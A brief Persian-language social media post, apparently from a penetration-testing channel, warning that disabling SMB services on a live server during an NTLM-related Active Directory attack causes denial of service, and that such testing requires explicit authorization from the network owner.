غیرفعالکردن سرویس های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.
@TryHackBox
#AD #NTLM #Attack
🔥4❤1